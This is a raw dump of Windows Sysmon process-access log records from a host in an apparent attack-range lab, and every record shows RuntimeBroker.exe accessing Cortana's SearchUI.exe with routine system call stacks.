13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
